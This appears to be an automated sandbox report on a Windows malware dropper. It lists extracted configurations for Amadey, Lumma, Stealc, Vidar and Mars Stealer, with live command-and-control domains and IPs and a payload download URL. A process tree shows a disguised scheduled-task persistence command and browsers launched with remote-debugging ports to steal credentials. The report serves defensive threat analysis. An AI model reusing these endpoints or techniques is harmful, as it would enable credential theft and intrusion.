Analysis

  • max time kernel
    300s
  • max time network
    301s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    16/03/2025, 19:03

General

  • Target

    daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe

  • Size

    3.7MB

  • MD5

    13ef8fe8386e9d1d01b6c3ad0c1c025e

  • SHA1

    7b547b46572ca8580f553df2fe11024247a0a7c8

  • SHA256

    daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30

  • SHA512

    37afc90eb59af4dce9ec624ffad0edb39631c3c5c6c80d4460f7f08fcab11f8b7281f044c4ff65c5780903a63e8281e990cb995f81f355ae6f7053866b402187

  • SSDEEP

    98304:z7Hcs51DVB/TaMcYb1j5b/s4sIUXo5E1RgbbO8ObKmM:zzc81DGMc2hLUo5ECiL

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://calmingtefxtures.run/api

https://foresctwhispers.top/api

https://htracnquilforest.life/api

https://presentymusse.world/api

https://deaddereaste.today/api

https://subawhipnator.life/api

https://privileggoe.live/api

https://boltetuurked.digital/api

https://pastedeputten.life/api

https://gunrightsp.run/api

https://caliberc.today/api

https://pistolpra.bet/api

https://weaponwo.life/api

https://armamenti.world/api

https://selfdefens.bet/api

https://targett.top/api

https://armoryarch.shop/api

https://blackeblast.run/api

https://codxefusion.top/api

https://hardswarehub.today/api

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

vidar

Version

13.2

Botnet

e3a5dc9f3619e7e1987b9fcc98b49843

C2

https://t.me/g_etcontent

https://steamcommunity.com/profiles/76561199832267488

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0

Extracted

Family

marsstealer

Botnet

Default

C2

ctrlgem.xyz/gate.php

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

lumma

C2

https://codxefusion.top/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 3 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Mars Stealer

    An infostealer written in C++ based on other infostealers.

  • Marsstealer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 52 IoCs
  • Uses browser remote debugging 2 TTPs 54 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 19 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Suspicious use of SetThreadContext 21 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 15 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 13 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 52 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 6 IoCs
  • Enumerates system info in registry 2 TTPs 36 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe
    "C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4168
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          4⤵
          • Downloads MZ/PE file
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:3348
          • C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe
            "C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1040
            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
              "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
              6⤵
              • Downloads MZ/PE file
              • Checks computer location settings
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:4716
              • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3532
                • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                  "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:5032
              • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4028
                • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                  "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5668
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 972
                  8⤵
                  • Program crash
                  PID:3816
              • C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe
                "C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5496
                • C:\Windows\SysWOW64\SCHTASKS.exe
                  SCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4448
              • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:4032
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  8⤵
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5992
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    9⤵
                    • Uses browser remote debugging
                    • Drops file in Windows directory
                    • Checks processor information in registry
                    • Enumerates system info in registry
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:4004
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff9e21cdcf8,0x7ff9e21cdd04,0x7ff9e21cdd10
                      10⤵
                        PID:2696
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1604,i,10876557083182659340,10889970045594159491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2184 /prefetch:3
                        10⤵
                          PID:6036
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2080,i,10876557083182659340,10889970045594159491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2104 /prefetch:2
                          10⤵
                            PID:2440
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2404,i,10876557083182659340,10889970045594159491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2596 /prefetch:8
                            10⤵
                              PID:2164
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,10876557083182659340,10889970045594159491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3148 /prefetch:1
                              10⤵
                              • Uses browser remote debugging
                              PID:3148
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,10876557083182659340,10889970045594159491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3128 /prefetch:1
                              10⤵
                              • Uses browser remote debugging
                              PID:2140
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4228,i,10876557083182659340,10889970045594159491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4252 /prefetch:2
                              10⤵
                              • Uses browser remote debugging
                              PID:1912
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4600,i,10876557083182659340,10889970045594159491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4716 /prefetch:1
                              10⤵
                              • Uses browser remote debugging
                              PID:3772
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5292,i,10876557083182659340,10889970045594159491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5256 /prefetch:8
                              10⤵
                                PID:3944
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5516,i,10876557083182659340,10889970045594159491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5528 /prefetch:8
                                10⤵
                                  PID:2364
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                9⤵
                                • Uses browser remote debugging
                                PID:5084
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
                                  10⤵
                                  • Uses browser remote debugging
                                  • Drops file in Windows directory
                                  • Enumerates system info in registry
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  PID:4396
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x288,0x7ff9e287f208,0x7ff9e287f214,0x7ff9e287f220
                                    11⤵
                                      PID:4580
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,12724863513899804130,5462472795628429285,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:3
                                      11⤵
                                        PID:652
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2248,i,12724863513899804130,5462472795628429285,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:2
                                        11⤵
                                          PID:4688
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2508,i,12724863513899804130,5462472795628429285,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8
                                          11⤵
                                            PID:2896
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3536,i,12724863513899804130,5462472795628429285,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
                                            11⤵
                                            • Uses browser remote debugging
                                            PID:6080
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3544,i,12724863513899804130,5462472795628429285,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
                                            11⤵
                                            • Uses browser remote debugging
                                            PID:2836
                                      • C:\ProgramData\sj5ph4e3e3.exe
                                        "C:\ProgramData\sj5ph4e3e3.exe"
                                        9⤵
                                        • Executes dropped EXE
                                        PID:6764
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          10⤵
                                            PID:6860
                                        • C:\ProgramData\pp8q9rimy5.exe
                                          "C:\ProgramData\pp8q9rimy5.exe"
                                          9⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:7176
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            10⤵
                                            • Downloads MZ/PE file
                                            • Loads dropped DLL
                                            • System Location Discovery: System Language Discovery
                                            • Checks processor information in registry
                                            PID:7208
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                              11⤵
                                              • Uses browser remote debugging
                                              • Drops file in Windows directory
                                              • Checks processor information in registry
                                              • Enumerates system info in registry
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:6348
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff9d622dcf8,0x7ff9d622dd04,0x7ff9d622dd10
                                                12⤵
                                                  PID:6356
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1520,i,8458924996021238204,9045533338873106565,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2452 /prefetch:3
                                                  12⤵
                                                    PID:7224
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2408,i,8458924996021238204,9045533338873106565,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2400 /prefetch:2
                                                    12⤵
                                                      PID:7248
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=1944,i,8458924996021238204,9045533338873106565,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2596 /prefetch:8
                                                      12⤵
                                                        PID:7240
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,8458924996021238204,9045533338873106565,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3324 /prefetch:1
                                                        12⤵
                                                        • Uses browser remote debugging
                                                        PID:3956
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,8458924996021238204,9045533338873106565,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3344 /prefetch:1
                                                        12⤵
                                                        • Uses browser remote debugging
                                                        PID:3812
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,8458924996021238204,9045533338873106565,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4268 /prefetch:2
                                                        12⤵
                                                        • Uses browser remote debugging
                                                        PID:6776
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4748,i,8458924996021238204,9045533338873106565,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4768 /prefetch:1
                                                        12⤵
                                                        • Uses browser remote debugging
                                                        PID:6204
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5196,i,8458924996021238204,9045533338873106565,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5220 /prefetch:8
                                                        12⤵
                                                          PID:7720
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5596,i,8458924996021238204,9045533338873106565,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5656 /prefetch:8
                                                          12⤵
                                                            PID:6560
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                          11⤵
                                                          • Uses browser remote debugging
                                                          PID:8944
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
                                                            12⤵
                                                            • Uses browser remote debugging
                                                            • Drops file in Windows directory
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                            PID:8956
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x308,0x7ff9d620f208,0x7ff9d620f214,0x7ff9d620f220
                                                              13⤵
                                                                PID:8984
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1900,i,9506818085128228516,10236388225707062011,262144 --variations-seed-version --mojo-platform-channel-handle=2300 /prefetch:3
                                                                13⤵
                                                                  PID:9204
